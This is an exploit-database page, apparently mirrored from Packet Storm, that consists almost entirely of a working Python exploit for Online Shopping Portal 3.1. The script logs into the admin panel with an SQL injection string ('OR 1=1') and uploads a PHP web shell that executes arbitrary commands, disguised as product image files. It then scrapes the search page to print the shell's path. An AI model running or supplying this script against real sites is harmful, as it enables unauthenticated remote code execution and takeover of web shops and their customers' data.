Exploit for Online Shopping Portal 3.1 Shell Upload

Name: Exploit for Online Shopping Portal 3.1 Shell Upload
Rating: 5 (235 reviews)
2021-06-17 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:163185
# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)  
# Date: 17.06.2021  
# Exploit Author: Tagoletta (Tağmaç)  
# Software Link: https://phpgurukul.com/shopping-portal-free-download/  
# Version: V3.1  
# Tested on: Windows & Ubuntu  
  
  
import requests  
import random  
import string  
  
  
url = "http://192.168.1.3:80/shopping"  
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"  
  
session = requests.session()  
  
print("logining")  
  
request_url = url+"/admin/"  
post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}  
session.post(request_url, data=post_data)  
  
let = string.ascii_lowercase  
shellname = ''.join(random.choice(let) for i in range(15))  
randstr = ''.join(random.choice(let) for i in range(15))  
  
print("product name is "+randstr)  
print("shell name is "+shellname)  
print("uploading payload")  
  
request_url = url+"/admin/insert-product.php"  
post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"}  
post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n"  
session.post(request_url, headers=post_header, data=post_data)  
  
request_url = url+"/search-result.php"  
post_data = {"product": randstr, "search": ''}  
shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0]  
  
print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")